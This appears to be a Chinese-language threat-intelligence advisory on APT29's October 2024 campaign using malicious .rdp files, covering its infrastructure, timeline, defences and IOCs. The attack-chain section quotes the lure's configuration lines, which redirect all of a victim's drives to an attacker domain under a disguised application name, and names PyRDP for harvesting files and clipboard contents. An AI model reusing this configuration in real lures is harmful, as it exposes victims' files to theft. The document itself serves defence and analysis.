攻击概述

Earth Koshchei（又称APT29）在2024年10月发起了一场利用恶意远程桌面协议（RDP）配置文件的攻击活动。该技术借鉴了Black Hills信息安全公司2022年公开的红队方法，包含三个核心组件：

• RDP中继服务器（193个域名）
• 恶意RDP服务器（34个后端节点）
• 诱导受害者连接的.rdp配置文件

技术细节

攻击链分析

1. 初始访问：通过鱼叉邮件发送恶意.rdp文件，文件名伪装成"AWS安全存储连接稳定性测试"
2. 连接重定向：配置文件将受害者导向攻击者控制的服务器，参数包含：

   1 2 3

   full address: eu-north-1.regeringskansliet-se.cloud drivestoredirect: s:* //重定向所有驱动器 remoteapplicationprogram: "AWS Secure Storage..." //伪装的应用程序名

3. 数据窃取：利用PyRDP工具实现：
   • 自动爬取重定向的驱动器文件
   • 窃取剪贴板内容
   • 无文件驻留（Living-off-the-land）

匿名化架构

攻击者采用三层隐匿措施：

1. 网络层：TOR出口节点+商业VPN+住宅代理（使用90+个IP轮换）
2. 控制通道：通过SSH over Tor管理基础设施
3. 邮件发送：入侵5个合法邮件服务器作为发件平台

时间线

• 准备阶段（2024年8-10月）：
  • 注册200+域名（平均每天4-5个）
  • 目标涉及政府（38%）、军事（22%）、云服务商（15%）
• 攻击高峰：10月22日集中发送钓鱼邮件
• 数据外泄：10月18-21日观察到军事目标的异常传输

防御建议

1. 阻止对外RDP连接到非信任服务器
2. 过滤邮件中的.rdp附件（Trend Micro检测为Trojan.Win32.HUSTLECON.A）
3. 监控异常RDP连接行为
4. 实施网络分段策略

IOC指标

完整威胁指标包含：

• 193个中继域名（如eu-south-2-aws[.]zero-trust[.]solutions）
• 34个后端服务器IP
• 恶意文件哈希值

该攻击展示了APT组织如何武器化红队工具，将原本用于防御测试的技术转化为攻击武器。企业应定期审查对外连接策略，特别是远程访问协议的安全配置。